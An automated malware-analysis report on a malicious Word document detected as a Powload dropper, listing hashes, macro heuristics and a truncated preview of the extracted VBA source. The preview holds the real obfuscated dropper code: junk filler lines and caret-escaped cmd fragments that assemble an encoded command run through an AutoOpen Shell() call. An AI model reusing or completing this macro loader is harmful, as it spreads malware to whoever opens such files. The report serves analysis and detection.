Office (OLE) malware analysis — malicious · af63dcc1ceb83cb5

MALICIOUS

Office (OLE)

78.0 KB Created: 2018-08-30 03:16:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: cc2517038a511c78d599e6182c2e79a8 SHA-1: cac89deef3d49b5b44385c5fff7ca204924026c7 SHA-256: af63dcc1ceb83cb5ade6b069bd5ba166ced02a30f0fa894594fa385cfc737907

202 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Powload-6666754-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Powload-6666754-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9761 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9761 bytes
SHA-256: `a621aab5cb0d8b3137c92e01c20417456b5e0467c3dae095cc4ed7948211c1b4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "imVaLvfjzL" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "XAjBTiimzpdzNE" Function KukiazMIQE() On _ Error _ Resume _ Next Hour 36104 / qHACX Hour hOOzO * KEBVfX * Rriqhj * 29853 hZAnFYCERoz = "m" + "d /V" + "^:^" + "ON/" + "C" + Chr(3 + 5 + 4 + 5 + 17) + "^" + "s^e" + "t ^3r=" + "AAC^A^" + "g" Hour hAXMA * bUKdIp rElmCSfn = "^A" + "^A" + "I^A" + "AC" + "^Ag" + "^A" + "AI^" + "AA" + "C^" + "A" Hour JaZAUt * bpBGF / szquT * fPBER Hour 41721 * LIXsjw Hour bPWJUc / aszwZ Hour SzSKA * kjNjub / 86369 / ZVJYDQ vzMivMtqo = "^g^AA" + "I" + "^" + "A^AC" + "A^g^AA" + "IA^AC^" Hour iCwqk / 24131 Hour 16641 / zbSJi / VUkfP * TasFur Hour 17381 / zNYLQI Hour HLiXh * kntlim * 62155 / WQpuT Hour 54550 / YSOJvQ * 51367 * Ktfmw Hour 23175 / TEOlZ zVVnF = "Ag^AA" + "^I^A^AC" + "^AgA^Q" + "f" + "^" + "A0^HA^" + "7" + "B^A^aA" + "^M" Hour 16865 / mSLzzh tdjQLSnXn = "^GA^0" + "B" + "^Q^Y^" + "A" + "MGA9^Bw" + "^OA" + "^s^GA^" + "h^BQ^ZA" + "^IH^A^i" Hour zoYqF / dfnMJX * TMrak / tHoDj Hour SuBzI / zwFZwt Hour 21872 / ksbYX / BObut / 48614 Hour cQiYkO * bTmcTn qJJbpaW = "^Bw^O" + "^AwE^AB" + "^B^Qa" + "A^QC^A^" + "g^A^" + "Qb^A^" + "U^GA" Hour Gwalp / CjGvdS * znUsQ / BkrOI Hour zSAVP / 66502 / 22810 / 40456 Hour ucOnaB * pYiOh * pYMcb * iiuhjn Hour 33420 * ZEOMwY hBqAoQjfaK = "0B" + "Q^S" + "^" + "A^0C" + "^AlB^wa" + "^" + "A^8^G^A" + "^2^Bg" + "bA^k" Hour 95883 * FjcvP * viAYKO * FGswCn Hour vTYWlO * oRliM * JzMDR * 2077 Hour 91113 / zjfVvU * VAjwsN * uqzCsj Hour CoPtG / VwYOH * mwPuE / EiXiSB Hour zGDkq / FrdqF SNwScZVDY = "EA^7AQ" + "^KA" + "w" + "^E^A^B" + "BQa^AQC" + "^Ag" Hour 13031 * YWNBoN Hour ACHil * CzaEzR oMuzfG = "^A" + "A^L^A" + "0" + "^EA^qB" + "Q" + "^YAQC" + "^A" + "^oA" + "QZAw^G" + "^ApB^g" KukiazMIQE = hZAnFYCERoz + rElmCSfn + vzMivMtqo + zVVnF + tdjQLSnXn + qJJbpaW + hBqAoQjfaK + SNwScZVDY + oMuzfG Hour 6787 * 25706 Hour 75549 * vIuSZ Hour 57531 / WkQtP Hour wnYhzJ / TszZD Hour 15526 / KqqHf / QuErc / CmzIZ End Function Function ZEwiaLi() On _ Error _ Resume _ Next Hour ZZDIU * itUpWw Hour zwOJlN * wEojr jGLYqNtHtC = "R" + "A^" + "Q^G^Ah^" + "Bwb^AwG" + "A^" + "u^Bw^" + "dA^" + "8" + "^GA^" + "EB^gL^" + "AI^F" + "A6^BQ^a" Hour BhOzWm * kODEj * zCUWlj / DwOhDt Hour 10330 * tBNGi * 47570 / oKYBNo Hour 80643 / IlzAM Hour rApEMU * cjVRv VGnAEl = "A^" + "QC" + "A^7^B" + "^Q" + "^" + "e^AI" + "H" + "^A^0^Bw" + "^e^AkC" + "A" + "^MB^wRA" Hour 98606 * ZrBqI Hour ScbOw * Twajdq qEjVf = "^M" + "HA^k^A" + "A" + "^I^A^4^" + "G^Ap^B" + "^AI^" + "A0E^Aq^" + "B" + "^" + "Q^Y" Hour FwMvac * mziVw Hour 52704 / wjCSj CdwizcBPVjD = "^AQCAo" + "^AA^a^" + "A^MG^A" + "h^BQ^Z^" + "A^IH^" + "Av" + "^B" + "^" Hour 65881 * 48235 * twCHZi * OwtHZF Hour 88108 / 8748 * cwZPr * 49805 Hour lzLHL / 84641 * zTnBXQ * vARjH pSnNUXi = "g^ZA^s^" + "D^" + "A" + "n^AQZA" + "g^" + "HA^" + "l^BgL^" + "A" + "cCArAQb" Hour hDPvj / hviKm Hour 98793 * kFcYW vfQHsViY = "^AcH" + "AhBA^" + "J^" + "AsC^AnA" + "AXAcC^A" + "rA^w^Y^" + "A^k" + "^G^A^" Hour WAfSO * LjFnwG / 78549 * mUdCP Hour 38002 / tGLsm Hour 86689 / wXKuKv / 6343 * XsoriS Hour 34240 / RHYOwH / bICwj * GKoLRX GpaXdlkiEdX = "sB" + "gY" + "AU^HAw" + "BgO^A" + "^Y^H" Hour AGvRu * tvhXD Hour PwZqG / UhPIa * UGYHWz / dmmrLX NhSBjU = "Au^B" + "^Q^Z^A" + "^QC^" + "A9AAT" + "^A^E" + "^EAp" + "^BAJAs" + "^D" + "AnA" + "^QO" + "Ak^DA3^" + "AwJ^A^A" ZEwiaLi = jGLYqNtHtC + VGnAEl + qEjVf + CdwizcBPVjD + pSnNUXi + vfQHsViY + GpaXdlkiEdX + NhSBjU Hour 21724 * VSQcG Hour iUrsYw / IlCfFi / 73694 * wUVazU End Function Function YWmSMuXAw() On _ Error _ Resume _ Next Hour GuJSWG / BBXjiM / nqilzF * DRrIt Hour tuzuQ / XVcQWT / 34304 / uzBtrB Hour bMXRW / nFlz ... (truncated)

SHA-256: a621aab5cb0d8b3137c92e01c20417456b5e0467c3dae095cc4ed7948211c1b4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "imVaLvfjzL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "XAjBTiimzpdzNE"
Function KukiazMIQE()

On _
Error _
Resume _
Next
Hour 36104 / qHACX
   Hour hOOzO * KEBVfX * Rriqhj * 29853
hZAnFYCERoz = "m" + "d /V" + "^:^" + "ON/" + "C" + Chr(3 + 5 + 4 + 5 + 17) + "^" + "s^e" + "t ^3r=" + "AAC^A^" + "g"
Hour hAXMA * bUKdIp
rElmCSfn = "^A" + "^A" + "I^A" + "AC" + "^Ag" + "^A" + "AI^" + "AA" + "C^" + "A"
Hour JaZAUt * bpBGF / szquT * fPBER
   Hour 41721 * LIXsjw
   Hour bPWJUc / aszwZ
   Hour SzSKA * kjNjub / 86369 / ZVJYDQ
vzMivMtqo = "^g^AA" + "I" + "^" + "A^AC" + "A^g^AA" + "IA^AC^"
Hour iCwqk / 24131
   Hour 16641 / zbSJi / VUkfP * TasFur
   Hour 17381 / zNYLQI
   Hour HLiXh * kntlim * 62155 / WQpuT
   Hour 54550 / YSOJvQ * 51367 * Ktfmw
   Hour 23175 / TEOlZ
zVVnF = "Ag^AA" + "^I^A^AC" + "^AgA^Q" + "f" + "^" + "A0^HA^" + "7" + "B^A^aA" + "^M"
Hour 16865 / mSLzzh
tdjQLSnXn = "^GA^0" + "B" + "^Q^Y^" + "A" + "MGA9^Bw" + "^OA" + "^s^GA^" + "h^BQ^ZA" + "^IH^A^i"
Hour zoYqF / dfnMJX * TMrak / tHoDj
   Hour SuBzI / zwFZwt
   Hour 21872 / ksbYX / BObut / 48614
   Hour cQiYkO * bTmcTn
qJJbpaW = "^Bw^O" + "^AwE^AB" + "^B^Qa" + "A^QC^A^" + "g^A^" + "Qb^A^" + "U^GA"
Hour Gwalp / CjGvdS * znUsQ / BkrOI
   Hour zSAVP / 66502 / 22810 / 40456
   Hour ucOnaB * pYiOh * pYMcb * iiuhjn
   Hour 33420 * ZEOMwY
hBqAoQjfaK = "0B" + "Q^S" + "^" + "A^0C" + "^AlB^wa" + "^" + "A^8^G^A" + "^2^Bg" + "bA^k"
Hour 95883 * FjcvP * viAYKO * FGswCn
   Hour vTYWlO * oRliM * JzMDR * 2077
   Hour 91113 / zjfVvU * VAjwsN * uqzCsj
   Hour CoPtG / VwYOH * mwPuE / EiXiSB
   Hour zGDkq / FrdqF
SNwScZVDY = "EA^7AQ" + "^KA" + "w" + "^E^A^B" + "BQa^AQC" + "^Ag"
Hour 13031 * YWNBoN
   Hour ACHil * CzaEzR
oMuzfG = "^A" + "A^L^A" + "0" + "^EA^qB" + "Q" + "^YAQC" + "^A" + "^oA" + "QZAw^G" + "^ApB^g"
KukiazMIQE = hZAnFYCERoz + rElmCSfn + vzMivMtqo + zVVnF + tdjQLSnXn + qJJbpaW + hBqAoQjfaK + SNwScZVDY + oMuzfG
   Hour 6787 * 25706
   Hour 75549 * vIuSZ
   Hour 57531 / WkQtP
   Hour wnYhzJ / TszZD
   Hour 15526 / KqqHf / QuErc / CmzIZ
End Function
Function ZEwiaLi()

On _
Error _
Resume _
Next
Hour ZZDIU * itUpWw
   Hour zwOJlN * wEojr
jGLYqNtHtC = "R" + "A^" + "Q^G^Ah^" + "Bwb^AwG" + "A^" + "u^Bw^" + "dA^" + "8" + "^GA^" + "EB^gL^" + "AI^F" + "A6^BQ^a"
Hour BhOzWm * kODEj * zCUWlj / DwOhDt
   Hour 10330 * tBNGi * 47570 / oKYBNo
   Hour 80643 / IlzAM
   Hour rApEMU * cjVRv
VGnAEl = "A^" + "QC" + "A^7^B" + "^Q" + "^" + "e^AI" + "H" + "^A^0^Bw" + "^e^AkC" + "A" + "^MB^wRA"
Hour 98606 * ZrBqI
   Hour ScbOw * Twajdq
qEjVf = "^M" + "HA^k^A" + "A" + "^I^A^4^" + "G^Ap^B" + "^AI^" + "A0E^Aq^" + "B" + "^" + "Q^Y"
Hour FwMvac * mziVw
   Hour 52704 / wjCSj
CdwizcBPVjD = "^AQCAo" + "^AA^a^" + "A^MG^A" + "h^BQ^Z^" + "A^IH^" + "Av" + "^B" + "^"
Hour 65881 * 48235 * twCHZi * OwtHZF
   Hour 88108 / 8748 * cwZPr * 49805
   Hour lzLHL / 84641 * zTnBXQ * vARjH
pSnNUXi = "g^ZA^s^" + "D^" + "A" + "n^AQZA" + "g^" + "HA^" + "l^BgL^" + "A" + "cCArAQb"
Hour hDPvj / hviKm
   Hour 98793 * kFcYW
vfQHsViY = "^AcH" + "AhBA^" + "J^" + "AsC^AnA" + "AXAcC^A" + "rA^w^Y^" + "A^k" + "^G^A^"
Hour WAfSO * LjFnwG / 78549 * mUdCP
   Hour 38002 / tGLsm
   Hour 86689 / wXKuKv / 6343 * XsoriS
   Hour 34240 / RHYOwH / bICwj * GKoLRX
GpaXdlkiEdX = "sB" + "gY" + "AU^HAw" + "BgO^A" + "^Y^H"
Hour AGvRu * tvhXD
   Hour PwZqG / UhPIa * UGYHWz / dmmrLX
NhSBjU = "Au^B" + "^Q^Z^A" + "^QC^" + "A9AAT" + "^A^E" + "^EAp" + "^BAJAs" + "^D" + "AnA" + "^QO" + "Ak^DA3^" + "AwJ^A^A"
ZEwiaLi = jGLYqNtHtC + VGnAEl + qEjVf + CdwizcBPVjD + pSnNUXi + vfQHsViY + GpaXdlkiEdX + NhSBjU
   Hour 21724 * VSQcG
   Hour iUrsYw / IlCfFi / 73694 * wUVazU
End Function
Function YWmSMuXAw()

On _
Error _
Resume _
Next
Hour GuJSWG / BBXjiM / nqilzF * DRrIt
   Hour tuzuQ / XVcQWT / 34304 / uzBtrB
   Hour bMXRW / nFlz
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.